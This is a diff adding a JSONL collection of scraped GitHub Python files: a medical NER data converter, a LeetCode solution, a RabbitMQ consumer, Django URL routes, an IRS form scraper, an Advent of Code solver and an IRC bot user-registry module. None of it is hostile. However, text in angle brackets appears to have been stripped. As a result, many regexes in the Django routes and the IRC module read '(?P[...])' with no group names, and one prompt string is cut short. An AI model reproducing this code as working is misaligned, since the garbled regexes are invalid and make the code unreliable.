diff --git "a/4888.jsonl" "b/4888.jsonl" new file mode 100644--- /dev/null +++ "b/4888.jsonl" @@ -0,0 +1,1321 @@ +{"seq_id":"72321914292","text":"#!/usr/bin/env python3\n# coding: utf-8\n# File: transfer_data.py\n# Author: lhy\n# Date: 18-12-24\n\nimport os\nfrom collections import Counter\n\nclass TransferData:\n def __init__(self):\n cur = '/'.join(os.path.abspath(__file__).split('/')[:-1])\n self.label_dict = {\n '检查和检验': 'CHECK',\n '症状和体征': 'SIGNS',\n '疾病和诊断': 'DISEASE',\n '治疗': 'TREATMENT',\n '身体部位': 'BODY'}\n\n self.cate_dict ={\n 'O':0,\n 'TREATMENT-I': 1,\n 'TREATMENT-B': 2,\n 'BODY-B': 3,\n 'BODY-I': 4,\n 'SIGNS-I': 5,\n 'SIGNS-B': 6,\n 'CHECK-B': 7,\n 'CHECK-I': 8,\n 'DISEASE-I': 9,\n 'DISEASE-B': 10\n }\n self.origin_path = os.path.join(cur, 'data_origin')\n self.train_filepath = os.path.join(cur, 'train.txt')\n return\n\n\n def transfer(self):\n f = open(self.train_filepath, 'w+')\n count = 0\n for root,dirs,files in os.walk(self.origin_path):\n for file in files:\n filepath = os.path.join(root, file)\n if 'original' not in filepath:\n continue\n label_filepath = filepath.replace('.txtoriginal','')\n print(filepath, '\\t\\t', label_filepath)\n content = open(filepath).read().strip()\n res_dict = {}\n for line in open(label_filepath):\n res = line.strip().split('\t')\n start = int(res[1])\n end = int(res[2])\n label = res[3]\n label_id = self.label_dict.get(label)\n for i in range(start, end+1):\n if i == start:\n label_cate = label_id + '-B'\n else:\n label_cate = label_id + '-I'\n res_dict[i] = label_cate\n\n for indx, char in enumerate(content):\n char_label = res_dict.get(indx, 'O')\n print(char, char_label)\n f.write(char + '\\t' + char_label + '\\n')\n f.close()\n return\n\n\n\nif __name__ == '__main__':\n handler = TransferData()\n train_datas = handler.transfer()","repo_name":"liuhuanyong/MedicalNamedEntityRecognition","sub_path":"transfer_data.py","file_name":"transfer_data.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":397,"dataset":"github-code","pt":"21"} +{"seq_id":"16647302032","text":"class Solution(object):\n def subsets(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n\n res = []\n self.dfs(nums,0,[], res)\n return res\n def dfs(self,nums, start, tmp, res):\n res.append(tmp[:]) #copy\n for i in range(start, len(nums)):\n tmp.append(nums[i])\n self.dfs(nums, i+1, tmp, res)\n tmp.pop()\n\n ","repo_name":"ny215/LeetcodeExercise","sub_path":"Backtracking/78. Subsets.py","file_name":"78. Subsets.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9768087197","text":"#!/usr/bin/env python\nimport argparse\nimport pprint\n\nparser = argparse.ArgumentParser(description = \"find words in file1 and not in file2\")\nparser.add_argument('file1', type=argparse.FileType('r'))\nparser.add_argument('file2', type=argparse.FileType('r'))\nparser.add_argument('-o','--out', type=argparse.FileType('w'), required = True)\nargs = parser.parse_args()\n\nfile1 = set([ record for record in args.file1.read().split() if not record.startswith(\"sample\") ])\nfile2 = set([ record for record in args.file2.read().split() if not record.startswith(\"sample\") ])\ndifference = file1 - file2\npprint.pprint(difference)\n\nwith open(\"PEP_missing\",\"w\") as fp:\n fp.writelines([ record+\"\\n\" for record in difference])\n","repo_name":"PiscatorX/misc-scripts","sub_path":"get_diff.py","file_name":"get_diff.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14405480414","text":"from aifc import Error\n\nimport pika, sys, os,re,json\nfrom pika import channel\nresult = None\n\ndef resive():\n connection = pika.BlockingConnection(pika.ConnectionParameters(host='rmq.esphere.local'))\n channel = connection.channel()\n channel.queue_declare(queue='notif_lkk_11.12',durable=True)\n\n def callback(ch, method, properties, body):\n global result\n result=body.decode()\n\n try:\n prepare_date=(body.decode())\n # print (type(prepare_date))\n if '79214199530' in prepare_date:\n\n json_date= json.loads(prepare_date)\n print(json_date['message']['text'])\n else:\n pass\n except (Exception, Error) as error:\n print(' нет номера '+ str(error))\n channel.basic_consume('notif_lkk_11.12', on_message_callback=callback ,auto_ack=True)\n channel.start_consuming()\nresive()\n","repo_name":"Ilasasds/sms","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32853096741","text":"from django.conf.urls.defaults import *\nfrom django.core.exceptions import ImproperlyConfigured\nfrom corehq.apps.reports.util import get_installed_custom_modules\nfrom corehq.apps.reports.dispatcher import (ProjectReportDispatcher, \n CustomProjectReportDispatcher, BasicReportDispatcher)\nimport logging\n\ndodoma_reports = patterns('corehq.apps.reports.dodoma',\n url('^household_verification_json$', 'household_verification_json'),\n url('^household_verification/$', 'household_verification'),\n)\n\n_phonelog_context = {\n 'report': {\n 'name': \"Device Logs\",\n }\n}\n\ncustom_report_urls = patterns('',\n CustomProjectReportDispatcher.url_pattern(),\n)\n\nphonelog_reports = patterns('',\n url(r'^$', 'phonelog.views.devices', name=\"phonelog_devices\", kwargs={\n 'template': 'reports/phonelog/devicelist.html',\n 'context': _phonelog_context\n }),\n url(r'^(?P[\\w\\-]+)/$', 'phonelog.views.device_log', name=\"device_log\", kwargs={\n 'template': 'reports/phonelog/devicelogs.html',\n 'context': _phonelog_context\n }),\n url(r'^(?P[\\w\\-]+)/raw/$', 'phonelog.views.device_log_raw', name=\"device_log_raw\", kwargs={\n 'template': 'reports/phonelog/devicelogs_raw.html',\n 'context': _phonelog_context\n }),\n)\n\nurlpatterns = patterns('corehq.apps.reports.views',\n url(r'^$', \"default\", name=\"reports_home\"),\n url(r'^saved/', \"saved_reports\", name=\"saved_reports\"),\n url(r'^saved_reports', 'old_saved_reports'),\n\n url(r'^case_data/(?P[\\w\\-]+)/(?P[\\w\\-:]+)/$', 'case_form_data', name=\"case_form_data\"),\n url(r'^case_data/(?P[\\w\\-]+)/$', 'case_details', name=\"case_details\"),\n url(r'^case_data/(?P[\\w\\-]+)/view/xml/$', 'case_xml', name=\"single_case_xml\"),\n\n # Download and view form data\n url(r'^form_data/(?P[\\w\\-:]+)/$', 'form_data', name='render_form_data'),\n url(r'^form_data/(?P[\\w\\-:]+)/download/$', 'download_form', name='download_form'),\n url(r'^form_data/(?P[\\w\\-:]+)/download-attachment/$',\n 'download_attachment', name='download_attachment'),\n url(r'^form_data/(?P[\\w\\-:]+)/archive/$', 'archive_form', name='archive_form'),\n url(r'^form_data/(?P[\\w\\-:]+)/unarchive/$', 'unarchive_form', name='unarchive_form'),\n\n # Custom Hook for Dodoma TODO should this be here?\n url(r'^dodoma/', include(dodoma_reports)),\n\n\n # Create and Manage Custom Exports\n url(r\"^export/$\", 'export_data'),\n\n # Download Exports\n # todo should eventually be moved to corehq.apps.export\n ## Custom\n url(r\"^export/custom/(?P[\\w\\-]+)/download/$\", 'export_default_or_custom_data', name=\"export_custom_data\"),\n ## Default\n url(r\"^export/default/download/$\", \"export_default_or_custom_data\", name=\"export_default_data\"),\n ## Bulk\n url(r\"^export/bulk/download/$\", \"export_default_or_custom_data\", name=\"export_bulk_download\", kwargs=dict(bulk_export=True)),\n ## saved\n url(r\"^export/saved/download/(?P[\\w\\-]+)/$\", \"hq_download_saved_export\", name=\"hq_download_saved_export\"),\n\n # once off email\n url(r\"^email_onceoff/(?P[\\w_]+)/$\", 'email_report'),\n url(r\"^custom/email_onceoff/(?P[\\w_]+)/$\", 'email_report',\n kwargs=dict(report_type=CustomProjectReportDispatcher.prefix)),\n\n # Saved reports\n url(r\"^configs$\", 'add_config', name='add_report_config'),\n url(r\"^configs/(?P[\\w-]+)$\", 'delete_config',\n name='delete_report_config'),\n\n # Scheduled reports\n url(r'^scheduled_reports/(?P[\\w-]+)?$',\n 'edit_scheduled_report', name=\"edit_scheduled_report\"),\n url(r'^scheduled_report/(?P[\\w-]+)/delete$',\n 'delete_scheduled_report', name='delete_scheduled_report'),\n url(r'^send_test_scheduled_report/(?P[\\w-]+)/$',\n 'send_test_scheduled_report', name='send_test_scheduled_report'),\n url(r'^view_scheduled_report/(?P[\\w_]+)/$',\n 'view_scheduled_report', name='view_scheduled_report'),\n\n # Internal Use\n url(r\"^export/forms/all/$\", 'export_all_form_metadata', name=\"export_all_form_metadata\"),\n url(r\"^export/forms/all/async/$\", 'export_all_form_metadata_async', name=\"export_all_form_metadata_async\"),\n url(r'^download/cases/$', 'download_cases', name='download_cases'),\n\n # TODO should this even be here?\n url(r'^phonelog/', include(phonelog_reports)),\n\n url(r'^custom/', include(custom_report_urls)),\n ProjectReportDispatcher.url_pattern(),\n)\n\nreport_urls = patterns('',\n BasicReportDispatcher.url_pattern(),\n)\n\nfor module in get_installed_custom_modules():\n module_name = module.__name__.split('.')[-1]\n try:\n custom_report_urls += patterns('',\n (r\"^%s/\" % module_name, include('{0}.urls'.format(module.__name__))),\n )\n except ImproperlyConfigured:\n logging.info(\"Module %s does not provide urls\" % module_name)","repo_name":"gmimano/commcaretest","sub_path":"corehq/apps/reports/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34976367714","text":"import requests\nimport lxml.html as lh\nimport json\nimport os\n\nprint(\"Enter:
...\" )\ninput_ = input().upper()\ntokens = input_.split(' ')\noutput = []\n\nfor token in tokens:\n form_number = 'Form ' + token\n url = \"https://apps.irs.gov/app/picklist/list/priorFormPublication.html?resultsPerPage=200&sortColumn=sortOrder&indexOfFirstRow=0&criteria=formNumber&value=\" + token + \"&isDescending=false\"\n\n #gets raw HTML data from url\n page = requests.get(url)\n\n #parse raw HTML\n page_content = lh.fromstring(page.content)\n\n xpathstring = '//tr[td[a[text() = \"Form ' + token + '\"]]]'\n data_list = page_content.xpath(xpathstring)\n\n #find form_title of form\n if len(data_list) > 0: \n form_title = data_list[0].find_class('MiddleCellSpacer')[0].text.lstrip().rstrip()\n else:\n form_title = 'NA'\n\n #find max_year of form \n if len(data_list) > 0: \n max_year = data_list[0].find_class('EndCellSpacer')[0].text.lstrip().rstrip()\n else:\n max_year = 'NA'\n \n #find min_year of form\n if len(data_list) > 0: \n min_year = data_list[len(data_list)-1].find_class('EndCellSpacer')[0].text.lstrip().rstrip()\n else:\n min_year = 'NA'\n\n data = {\n 'form_number': form_number, \n 'form_title': form_title , \n 'min_year': min_year, \n 'max_year': max_year\n }\n\n output.append(data)\n\nprint(output)\njson.dumps(output)","repo_name":"erinnaw/IRS_form_retriever","sub_path":"part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40794939759","text":"from timeit import default_timer as timer\n\ndef get_input():\n with open(\"./day16/16.in\", \"r\") as f:\n fields, own, others = f.read().split(\"\\n\\n\")\n fields = [[f.split(' or ')for f in field.split(': ')]\n for field in fields.split(\"\\n\")]\n rules = {}\n for item in fields:\n a = set()\n for val in item[1]:\n val = val.split('-')\n a |= set(range(int(val[0]), int(val[1])+1))\n rules[item[0][0]] = a \n own = list(map(int, own.splitlines()[1].split(',')))\n others = [list(map(int, other.split(','))) for other in others.splitlines()[1:]]\n return (rules, own, others)\n\n\ndef p1(data):\n res = 0\n # Aid with part2\n valid = []\n for ticket in data[2]:\n # Aid with part2\n invalid = False\n for value in ticket:\n if not any([value in field for field in data[0].values()]):\n invalid = True\n res += value\n # Aid with part2\n if not invalid:\n valid.append(ticket)\n return res, valid\n\n\ndef p2(data, tickets):\n rules = data[0]\n own = data[1]\n # Dictionary of what field relates to what column\n potentialRulesIndex = {key: [] for key in rules.keys()}\n rulesIndex = {key: None for key in rules.keys()}\n # Packs data up by column\n tickets = list(zip(*tickets))\n for values in tickets:\n # Go throigh and find what each 'column' could represent based on where it would be valid for all.\n for cond, nums in rules.items():\n if all(val in nums for val in values):\n potentialRulesIndex[cond].append(values)\n\n # Assumed always column with just one option\n while [None] * len(potentialRulesIndex.values()) != list(potentialRulesIndex.values()):\n for cond, poss in potentialRulesIndex.items():\n removed = None\n if poss != None:\n # Only option that the column can be\n if len(poss) == 1:\n rulesIndex[cond] = poss[0]\n potentialRulesIndex[cond] = None\n removed = poss\n # If found column with 1 item, remove all referces to it from other potential rules.\n if removed != None :\n for c in potentialRulesIndex.keys():\n if potentialRulesIndex[c] != None and removed[0] in potentialRulesIndex[c]:\n potentialRulesIndex[c].remove(removed[0])\n\n ans = 1\n for key, val in rulesIndex.items():\n index = tickets.index(val)\n if \"departure\" in key:\n ans *= own[index]\n return ans \n\n\nprint(\"Day 16: Ticket Translation\")\ndata = get_input()\np1start = timer()\np1, tickets = p1(data)\np1end = timer()\nprint(f\"Part 1: {p1} in {p1end-p1start}s.\")\n\np2start = timer()\np2 = p2(data, tickets)\np2end = timer()\nprint(f\"Part 2: {p2} in {p2end-p2start}s.\")\n","repo_name":"jkershaw2000/aoc","sub_path":"2020/day16/16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4306795309","text":"import pymongo\n\nclient = pymongo.MongoClient('localhost', 27017)\ndb = client.test\nstu = db.stu\nstu.insert({'name':'nandi','age':54})\nstu.update({'name':'nandi'},{'$set':{'gender':1}})\ns1 = stu.find()\nfor s in s1:\n print(s)\nprint(stu.count())","repo_name":"guan-zi/homework","sub_path":"第四章数据库/mongodb/mongotest1.py","file_name":"mongotest1.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72101022133","text":"import csv\nfrom operator import itemgetter\nreader = csv.reader(open(\"imdbData/title.episode.tsv\"), delimiter=\"\\t\")\n\nf = open('episode.sorted.tsv', 'w')\n\nfor line in sorted(reader, key=itemgetter(0)):\n\n str_to_write = line[0]+'\\t'+line[1]+'\\t'+line[2]+'\\t'+line[3]+'\\n'\n print(str_to_write)\n f.write(str_to_write)\n\nf.close()\n ","repo_name":"leobouts/Merge_join_database_queries","sub_path":"sort_tsv_by_column.py","file_name":"sort_tsv_by_column.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42041418598","text":"from __future__ import annotations\n\nimport fnmatch\nimport time\nimport re\nfrom typing import Callable, Optional, Iterable, TYPE_CHECKING\n\nfrom src.context import IRCContext, Features, NotLoggedIn, lower\nfrom src import config, db\nfrom src.events import Event, EventListener\nfrom src.debug import CheckedDict, CheckedSet, handle_error\nfrom src.match import Match\n\nif TYPE_CHECKING:\n from src.containers import UserSet, UserDict, UserList\n from src.gamestate import GameState\n from src.channels import Channel\n\n__all__ = [\"Bot\", \"predicate\", \"get\", \"add\", \"users\", \"disconnected\", \"complete_match\",\n \"parse_rawnick\", \"parse_rawnick_as_dict\", \"User\", \"FakeUser\", \"BotUser\"]\n\nBot: BotUser = None # type: ignore[assignment]\n\n_users: CheckedSet[User] = CheckedSet(\"users._users\")\n_ghosts: CheckedSet[User] = CheckedSet(\"users._ghosts\")\n_pending_account_updates: CheckedDict[User, CheckedDict[str, Callable]] = CheckedDict(\"users._pending_account_updates\")\n\n_arg_msg = \"(user={0:for_tb_verbose}, allow_bot={1})\"\n\n# This is used to tell if this is a fake nick or not. If this function\n# returns a true value, then it's a fake nick. This is useful for\n# testing, where we might want everyone to be fake nicks.\npredicate = re.compile(r\"^[0-9]+$\").search\n\ndef get(nick=None, ident=None, host=None, account=None, *, allow_multiple=False, allow_none=False, allow_bot=False, allow_ghosts=False, update=False):\n \"\"\"Return the matching user(s) from the user list.\n\n :param nick: Nickname or raw nick (nick!ident@host) to match.\n If a raw nick is passed, the `ident` and `host` args must be None.\n :param ident: Ident to match.\n :param host: Host to match.\n :param account: Account to match.\n :param allow_multiple: Allow multiple matches, returning a list (even if only one match).\n :param allow_none: Allow no matches, returning None if nothing found. Otherwise raises KeyError.\n :param allow_bot: Allow the BotUser to be matched and returned.\n :param allow_ghosts: Allow disconnected users to be matched and returned.\n :param update: If a raw nick was passed and case-insensitively matches an existing user, the existing\n user will be updated to match the case of the raw nick. This works around some odd behavior in some\n ircds with respect to case-sensitivity. This should only be True if a raw nick is passed and\n if the raw nick comes from a trusted source (i.e. generated by the ircd itself)\n :returns: The matched user(s), if any.\n :raises KeyError: If no users match and allow_none is False.\n :raises ValueError: If multiple users match and allow_multiple is False.\n \"\"\"\n\n have_raw_nick = False\n raw_nick = None\n if ident is None and host is None and nick is not None:\n raw_nick = nick\n nick, ident, host = parse_rawnick(nick)\n if ident is not None and host is not None:\n have_raw_nick = True\n\n sentinel = object()\n\n temp = User(sentinel, nick, ident, host, account)\n if temp.client is not sentinel: # actual client\n return [temp] if allow_multiple else temp\n\n potential = []\n users = set(_users)\n if not allow_ghosts:\n users.difference_update(_ghosts)\n if allow_bot:\n try:\n users.add(Bot)\n except ValueError:\n pass # Bot may not be hashable in early init; this is fine and User.__new__ handles this gracefully\n\n for user in users:\n if update and have_raw_nick:\n # check for variations in case; this is the *only* time when users.get() can be case-insensitive\n if user.lower().partial_match(temp.lower()):\n # changing rawnick could swap user out, so we need to fetch the new instance\n # (with update=False to avoid recursion)\n user.rawnick = raw_nick\n return get(raw_nick, allow_multiple=allow_multiple, allow_none=allow_none, allow_bot=allow_bot, allow_ghosts=allow_ghosts, update=False)\n elif user.partial_match(temp):\n potential.append(user)\n\n if allow_multiple:\n return potential\n\n if len(potential) == 1:\n return potential[0]\n\n if len(potential) > 1:\n raise ValueError(\"More than one user matches: \" +\n _arg_msg.format(temp, allow_bot))\n\n if not allow_none:\n raise KeyError(_arg_msg.format(temp, allow_bot))\n\n return None\n\ndef add(cli, *, nick, ident=None, host=None, account=NotLoggedIn):\n \"\"\"Create a new user, add it to the user list and return it.\n\n This function takes up to 4 keyword-only arguments (and one positional\n argument, cli): nick, ident, host, and account.\n With the exception of the first one, any parameter can be omitted.\n\n \"\"\"\n\n if ident is None and host is None and nick is not None:\n nick, ident, host = parse_rawnick(nick)\n\n cls = User\n if predicate(nick):\n cls = FakeUser\n\n new = cls(cli, nick, ident, host, account)\n\n if new is not Bot:\n try:\n hash(new)\n except ValueError:\n pass\n else:\n _users.add(new)\n\n return new\n\ndef users():\n \"\"\"Iterate over the users in the registry.\"\"\"\n yield from _users\n\ndef disconnected():\n \"\"\"Iterate over the users who are in-game but disconnected.\"\"\"\n yield from _ghosts\n\ndef complete_match(pattern: str, scope: Optional[Iterable[User]] = None):\n \"\"\" Find a user or users who match the given pattern.\n\n :param pattern: Pattern to match on. The format is \"[nick][:account]\",\n with [] denoting an optional field. Exact matches are tried, and then\n prefix matches (stripping special characters as needed). If both a nick\n and an account are specified, both must match.\n :param Optional[Iterable[User]] scope: Users to match pattern against. If None,\n search against all users.\n :returns: A Match object describing whether or not the match succeeded.\n :rtype: Match[User]\n \"\"\"\n if scope is None:\n scope = _users\n matches: list[User] = []\n nick_search, _, acct_search = lower(pattern).partition(\":\")\n if not nick_search and not acct_search:\n return Match([])\n\n direct_match = False\n for user in scope:\n nick = lower(user.nick)\n stripped_nick = nick.lstrip(\"[{\\\\^_`|}]\")\n if nick_search:\n if nick == nick_search:\n if not direct_match:\n matches.clear()\n direct_match = True\n matches.append(user)\n elif not direct_match and (nick.startswith(nick_search) or stripped_nick.startswith(nick_search)):\n matches.append(user)\n else:\n matches.append(user)\n\n if acct_search:\n scope = list(matches)\n matches.clear()\n direct_match = False\n for user in scope:\n if not user.account:\n continue # fakes don't have accounts, so this search won't be able to find them\n acct = lower(user.account)\n stripped_acct = acct.lstrip(\"[{\\\\^_`|}]\")\n if acct == acct_search:\n if not direct_match:\n matches.clear()\n direct_match = True\n matches.append(user)\n elif not direct_match and (acct.startswith(acct_search) or stripped_acct.startswith(acct_search)):\n matches.append(user)\n\n return Match(matches)\n\n_raw_nick_pattern = re.compile(r\"^(?P.+?)(?:!(?P.+?)@(?P.+))?$\")\n\ndef parse_rawnick(rawnick, *, default=None):\n \"\"\"Return a tuple of (nick, ident, host) from rawnick.\"\"\"\n\n return _raw_nick_pattern.search(rawnick).groups(default)\n\ndef parse_rawnick_as_dict(rawnick, *, default=None):\n \"\"\"Return a dict of {\"nick\": nick, \"ident\": ident, \"host\": host}.\"\"\"\n\n return _raw_nick_pattern.search(rawnick).groupdict(default)\n\ndef _cleanup_user(evt, var: GameState, user: User):\n \"\"\"Removes a user from our global tracking set once it has left all channels.\"\"\"\n # if user is in-game, keep them around so that other players can act on them\n # and so that they can return to the village. If they aren't in game, erase\n # all memory of them from the bot.\n if var and var.in_game and user in var.players:\n user.disconnected = True\n else:\n user.disconnected = False\n _users.discard(user)\n\ndef _reset(evt, var):\n \"\"\"Cleans up users that left during game during game end.\"\"\"\n for user in _ghosts:\n if not user.channels:\n _users.discard(user)\n _ghosts.clear()\n\ndef _update_account(evt, user):\n \"\"\"Updates account data of a user for networks which don't support certain features.\"\"\"\n if evt.params.old in _pending_account_updates:\n updates = list(_pending_account_updates[evt.params.old].items())\n del _pending_account_updates[evt.params.old]\n for command, callback in updates:\n # handle_error swallows exceptions so that a callback raising an exception\n # does not prevent other registered callbacks from running\n handle_error(callback)(user)\n\n# Can't use @event_listener decorator since src/decorators.py imports us\n# (meaning decorator isn't defined at the point in time we are run)\nEventListener(_cleanup_user).install(\"cleanup_user\")\nEventListener(_reset).install(\"reset\")\nEventListener(_update_account).install(\"who_end\")\n\nclass User(IRCContext):\n\n is_user = True\n\n _ident: str\n _host: str\n _account: str\n\n channels: CheckedDict[Channel, set[str]]\n timestamp: float\n account_timestamp: float\n\n sets: list[UserSet]\n lists: list[UserList]\n dict_keys: list[UserDict]\n dict_values: list[UserDict]\n\n def __init__(self, cli, nick, ident, host, account):\n \"\"\"Make linters happy.\"\"\"\n super().__init__(nick, cli)\n\n def __new__(cls, cli, nick, ident, host, account):\n self: User = super().__new__(cls)\n self.__init__(cli, nick, ident, host, account)\n if account in (\"0\", \"*\"):\n account = NotLoggedIn\n\n self._ident = ident\n self._host = host\n self._account = account\n self.channels = CheckedDict(\"users.User.channels\")\n self.timestamp = time.time()\n self.sets = []\n self.lists = []\n self.dict_keys = []\n self.dict_values = []\n self.account_timestamp = time.time()\n\n if Bot is not None and nick is not None and Bot.nick.rstrip(\"_\") == nick.rstrip(\"_\") and None in {Bot.ident, Bot.host}:\n # Bot ident/host being None means that this user isn't hashable, so it cannot be in any containers\n # which store by hash. As such, mutating the properties is safe.\n self = Bot\n self.name = nick\n if ident is not None:\n self._ident = ident\n if host is not None:\n self._host = host\n self._account = account\n self.timestamp = time.time()\n self.account_timestamp = time.time()\n\n elif (cls.__name__ == \"User\" and Bot is not None\n and Bot.nick == nick and ident is not None and host is not None\n and Bot.ident != ident and Bot.host == host and Bot.account == account):\n # Messages sent in early init may give us an incorrect ident (such as because we're waiting for\n # a response from identd, or there is some *line which overrides the ident for the bot).\n # Since Bot.ident attempts to create a new BotUser, we guard against recursion by only following this\n # branch if we're constructing a top-level User object (such as via users.get)\n Bot.ident = ident\n self = Bot\n\n elif nick is not None and ident is not None and host is not None and account is not None:\n users = set(_users)\n users.add(Bot)\n if self in users:\n for user in users:\n if self == user:\n self = user\n break\n\n else:\n # This takes a different code path because of slightly different\n # conditions; in the above case, the ident and host are both known,\n # and so the instance is hashable. Being hashable, it can be checked\n # for set containment, and exactly one instance in that set will be\n # equal (since the hash is based off of the ident and host, and the\n # comparisons check for all those two attributes among others, two\n # instances cannot possibly be equal while having a different hash).\n #\n # In this case, however, at least the ident or the host is missing,\n # and so the hash cannot be calculated. This means that two instances\n # may compare equal and hash to different values (since only non-None\n # attributes are compared), so we need to run through the entire set\n # no matter what to make sure that one - and only one - instance in\n # the set compares equal with the new one. We can't know in advance\n # whether or not there is an instance that compares equal to this one\n # in the set, or if multiple instances are going to compare equal to\n # this one.\n #\n # The code paths, while similar in functionality, fulfill two distinct\n # purposes; the first path is usually for when new users are created\n # from a WHO reply, with all the information. This is the most common\n # case. This path, on the other hand, is for the less common cases,\n # where only the nick is known (for example, a KICK target), and where\n # the user may or may not already exist. In that case, it's easier and\n # better to just try to create a new user, which this code can then\n # implicitly replace with the equivalent user (instead of trying to get\n # an existing user or creating a new one if that fails). This is also\n # used as a short-circuit for get().\n #\n # Please don't merge these two code paths for the sake of simplicity,\n # and instead opt for the sake of clarity that this separation provides.\n\n potential = None\n users = set(_users)\n if Bot is not None:\n users.add(Bot)\n for user in users:\n if self.partial_match(user):\n if potential is None:\n potential = user\n else:\n break # too many possibilities\n else:\n if potential is not None:\n self = potential\n\n return self\n\n def __str__(self):\n return \"{self.__class__.__name__}: {self.nick}!{self.ident}@{self.host}:{self.account}\".format(self=self)\n\n def __repr__(self):\n return \"{self.__class__.__name__}({self.nick!r}, {self.ident!r}, {self.host!r}, {self.account!r}, {self.channels!r})\".format(self=self)\n\n def __format__(self, format_spec):\n if format_spec == \"@\":\n return \"\\u0002{0}\\u0002\".format(self.name)\n elif format_spec in (\"for_tb\", \"for_tb_verbose\"):\n user_data_level = config.Main.get(\"telemetry.errors.user_data_level\")\n if user_data_level == 0:\n return \"{self.__class__.__name__}({0:x})\".format(id(self), self=self)\n elif user_data_level == 1 or format_spec == \"for_tb\":\n return \"{self.__class__.__name__}({self.nick!r}, {0:x})\".format(id(self), self=self)\n else:\n return repr(self)\n return super().__format__(format_spec)\n\n def __hash__(self):\n # check intentionally omits account: account may be None for normal operation for any user.\n if self.nick is None or self.ident is None or self.host is None:\n raise ValueError(\"cannot hash a User with no nick, ident, or host\")\n return hash((self.nick, self.ident, self.host, self.account))\n\n def __eq__(self, other):\n return (isinstance(other, User)\n and self.nick == other.nick\n and self.ident == other.ident\n and self.host == other.host\n and self.account == other.account)\n\n def __lt__(self, other):\n if not isinstance(other, User):\n return NotImplemented\n\n self_comp = self.name if self.is_fake else self.account\n other_comp = other.name if other.is_fake else other.account\n return self_comp < other_comp\n\n def partial_match(self, other):\n \"\"\"Test if our non-None properties match the non-None properties on the other object.\n\n :param other: Object to compare with\n :returns: True if `other` is a User object and the non-None properties match our non-None properties.\n \"\"\"\n val = self._compare(other, __class__, \"nick\", \"ident\", \"host\", \"account\")\n if val is NotImplemented:\n raise TypeError(f\"{other.__class__.__name__} is not a subclass of {__class__.__name__}\")\n return val\n\n # User objects are not copyable - this is a deliberate design decision\n # Therefore, those two functions here only return the object itself\n # Even if we tried to create new instances, the logic in __new__ would\n # just fetch back the same instance, so we save ourselves the trouble\n\n def __copy__(self):\n return self\n\n def __deepcopy__(self, memo):\n return self\n\n def swap(self, new: User, *, same_user=False):\n \"\"\"Swap yourself out with the new user everywhere.\n\n :param new: New user to replace current one with.\n :param same_user: If True, indicates `new` is the same user instance as `self`, just\n with updated values. This performs some additional work to ensure that the hand-off\n does not lose any data.\n \"\"\"\n if self is new:\n return # as far as the caller is aware, we've swapped\n\n _ghosts.discard(self)\n if not self.channels or same_user:\n _users.discard(self) # Goodbye, my old friend\n\n for lst in self.lists[:]:\n while self in lst:\n lst[lst.index(self)] = new\n\n for s in self.sets[:]:\n s.remove(self)\n s.add(new)\n\n for dk in self.dict_keys[:]:\n dk[new] = dk.pop(self)\n\n for dv in self.dict_values[:]:\n for key in dv:\n if dv[key] is self:\n dv[key] = new\n\n if same_user:\n global Bot\n new.channels = self.channels\n for channel in self.channels:\n channel.users.discard(self)\n channel.users.add(new)\n for mode in Features[\"PREFIX\"].values():\n if self in channel.modes.get(mode, ()):\n channel.modes[mode].discard(self)\n channel.modes[mode].add(self)\n\n if not isinstance(new, BotUser):\n _users.add(new)\n\n if self is Bot:\n assert isinstance(new, BotUser)\n Bot = new\n\n # It is the containers' responsibility to properly remove themselves from the users\n # So if any list is non-empty, something went terribly wrong\n assert not self.lists and not self.sets and not self.dict_keys and not self.dict_values\n\n def lower(self):\n temp = type(self)(self.client, lower(self.nick), lower(self.ident), lower(self.host, casemapping=\"ascii\"), lower(self.account))\n if temp is not self: # If everything is already lowercase, we'll get back the same instance\n temp.channels = self.channels\n temp.ref = self.ref or self\n return temp\n\n def is_owner(self):\n if self.is_fake:\n return False\n\n # FIXME: needs to be transport aware\n acls = config.Main.get(\"access.entries\")\n accounts = set(e[\"account\"] for e in acls if e[\"template\"] == \"owner\")\n\n if self.account and self.account in accounts:\n return True\n\n return False\n\n def is_admin(self):\n if self.is_fake:\n return False\n\n flags = db.FLAGS[self.account]\n\n if \"F\" not in flags:\n try:\n # FIXME: needs to be transport aware\n acls = config.Main.get(\"access.entries\")\n accounts = set(e[\"account\"] for e in acls if e[\"template\"] in (\"admin\", \"owner\"))\n if self.account and self.account in accounts:\n return True\n except AttributeError:\n pass\n\n return self.is_owner()\n\n return True\n\n def get_send_type(self, *, is_notice=False, is_privmsg=False):\n if is_privmsg:\n return \"PRIVMSG\"\n if is_notice:\n return \"NOTICE\"\n if self.prefers_notice():\n return \"NOTICE\"\n return \"PRIVMSG\"\n\n def match_hostmask(self, hostmask):\n \"\"\"Match n!u@h, u@h, or just h by itself.\"\"\"\n nick, ident, host = re.match(\"(?:(?:(.*?)!)?(.*?)@)?(.*)\", hostmask).groups(\"\")\n temp = self.lower()\n\n return ((not nick or fnmatch.fnmatch(temp.nick, lower(nick))) and\n (not ident or fnmatch.fnmatch(temp.ident, lower(ident))) and\n fnmatch.fnmatch(temp.host, lower(host, casemapping=\"ascii\")))\n\n 